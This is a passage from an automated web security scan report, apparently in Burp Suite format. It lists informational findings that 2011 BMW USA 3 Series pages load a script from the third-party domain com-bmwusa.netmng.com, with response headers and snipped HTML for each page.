Path:	/standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:11 GMT;path=/
Content-Length: 226530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.74. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:29 GMT;path=/
Content-Length: 217613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.75. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:35 GMT;path=/
Content-Length: 202177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.76. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:16:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:36:14 GMT;path=/
Content-Length: 202178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.77. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:19 GMT;path=/
Content-Length: 214393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.78. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:17:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:37:18 GMT;path=/
Content-Length: 225963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.79. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:59 GMT;path=/
Content-Length: 214580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.80. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:31:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:11 GMT;path=/
Content-Length: 202520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.81. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iconvertible/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:30:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:50:32 GMT;path=/
Content-Length: 214891

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.82. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:32:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:06 GMT;path=/
Content-Length: 201005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.83. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:31:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:05 GMT;path=/
Content-Length: 216544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.84. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335icoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:37 GMT;path=/
Content-Length: 202158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.85. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335icoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:21:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:41:48 GMT;path=/
Content-Length: 214704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.86. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335icoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:43 GMT;path=/
Content-Length: 200807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.87. http://www.bmwusa.com/standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335icoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:22:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:42:36 GMT;path=/
Content-Length: 215578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.88. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:35 GMT;path=/
Content-Length: 202557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.89. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isconvertible/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:32:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:52:27 GMT;path=/
Content-Length: 214980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.90. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isconvertible/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:52 GMT;path=/
Content-Length: 202285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.91. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isconvertible/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:33:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:53:05 GMT;path=/
Content-Length: 215689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.92. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iscoupe/3seriescoupemediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:24:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:33 GMT;path=/
Content-Length: 202195

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.93. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iscoupe/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:23:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:43:30 GMT;path=/
Content-Length: 214786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.94. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iscoupe/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:25:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:45:45 GMT;path=/
Content-Length: 202076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.95. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iscoupe/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:24:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:44:20 GMT;path=/
Content-Length: 214910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.96. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:34:29 GMT;path=/
Content-Length: 202153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.97. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/3seriessedanmediagallery.aspx%20%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:39 GMT;path=/
Content-Length: 202155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.98. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:13:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:33:01 GMT;path=/
Content-Length: 214935

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.99. http://www.bmwusa.com/standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335isedan/features_and_specs/default.aspx

Issue detail

